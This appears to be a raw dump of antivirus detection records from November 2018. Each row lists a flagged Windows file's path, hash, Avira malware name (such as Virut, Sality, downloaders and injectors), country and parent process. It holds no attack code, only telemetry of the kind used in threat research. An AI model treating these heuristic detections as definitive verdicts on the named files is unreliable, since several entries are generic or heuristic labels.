  Row(detection=Row(filename='avscan-20181102-093342-7b084e26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea81adcc\\AVSCAN-20181102-093329-787126EF\\AVSCAN-20181102-093342-7B084E26', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:33:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powerups.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\PowerUps\\PowerUps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:56:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='0c78da3d90f2b7b5976846aaa31136a601a9f378a646284a2db245abce5e346f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe803_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe803 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc4e133aa1-ece4-4648-ab9c-e05a595c164f.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc4E133AA1-ECE4-4648-AB9C-E05A595C164F.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T19:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\Outlander PHEV\\TOOL\\MSV\\ENV\\MSVE\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='00d0a73c885e1d7b9978b3d9204e754e9625a0ef15d3e1dccf8c2443cfe1c6c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061418-802f6532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061418-802F6532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wrapper32.exe', filepath='c:\\users\\X\\ostiumclients\\guard\\wrapper32.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='4e0cfcd6a5358c4465ddc79d70cd314859633ad974fbeac04f8c4cbcaf7b39ee', metadata=Row(cmdline='-XX:HeapDumpPath=ThisTricksIntelDriversF...indows 10\\" -Dos.version=10.0 -Davn32=C:\\\\Users\\\\Windows\\\\ostiumclients\\\\guard\\\\Avanguard32.dll -Davn64=C:\\\\Users\\\\Windows\\\\ostiumclients\\\\guard\\\\Avanguard64.dll -Dfml.ignorePatchDiscrep...leAttachMechanism -Djava.library.path=C:\\\\Users\\\\Windows\\\\ostiumclients\\\\updates\\\\MagicRPG\\\\...\\\\MagicRPG\\\\libraries\\\\com\\\\paulscode\\\\codecwav\\\\20101023\\\\codecwav-20101023.jar;C:\\\\Users\\\\Windows\\\\ostiumclients\\\\updates\\\\MagicRPG\\\\libraries\\\\com\\\\paulscode\\\\libraryjavaso', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Java\\jre1.8.0_181\\bin\\java.exe', parentsize=192376, timestamp='2018-11-02T06:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050249-83af8d99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050249-83AF8D99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132006-f584e0df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132006-F584E0DF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:23:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='52ddc21dd94dffdfaf2cff0bef8e20129f46d2a0594af38c71b68ad3da57153e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:58:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050249-83fe9272', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050249-83FE9272', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Sample Videos\\Videos.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061350-6fa48c1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061350-6FA48C1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='logonui.exe', filepath='\\?\\C:\\Windows\\Fonts\\logonUi.exe', filesize=1024000, name='TR/Agent.bqqua.#M1.#R1'), hash='73c6c7614b1b20ea6085c1592248dfc26aedd72f3865eccb02b6f5f7fae6ee11', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:42:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050240-7ee6641f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050240-7EE6641F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123543-6498a066', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_edcbeaaa\\AVSCAN-20181102-123356-578F4201\\AVSCAN-20181102-123543-6498A066', filesize=144000, name='ADWARE/BrowseFox.Gen7.#M1.#R1'), hash='5e5afe9b7ccfda81c0afa92ced484eed968a067d5c36f038bdc3ef1eee78ed66', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:36:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:24:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='52ddc21dd94dffdfaf2cff0bef8e20129f46d2a0594af38c71b68ad3da57153e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:37:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053106-77469416', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053106-77469416', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061427-85fdd26e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061427-85FDD26E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='haitin.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\haitiN\\haitiN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00007647', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00007647', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151555-00d78504', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151555-00D78504', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132439-2844328c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132439-2844328C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054721-bcb78780', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054721-BCB78780', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123422-4598294b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cb62c39\\AVSCAN-20181102-123129-2C346BB9\\AVSCAN-20181102-123422-4598294B', filesize=512000, name='Worm/Delf.512553.#M1.#R1'), hash='7123b8bf12905ac0865284300759bc17d13c9f105fffd3b854dd901b43f040a1', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053102-753d8e4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053102-753D8E4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055302-87d6e651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055302-87D6E651', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061854-24f75532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061854-24F75532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052438-9043ad41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052438-9043AD41', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061156-2bee9922', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061156-2BEE9922', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051817-aceffe3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051817-ACEFFE3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062557-214c495c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062557-214C495C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052027-fa8da3eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052027-FA8DA3EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053608-2b8e78a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053608-2B8E78A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060901-c354cc9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060901-C354CC9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052644-db8bade8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052644-DB8BADE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:43Z'), dt=datetime.date(2018, 11, 2)),
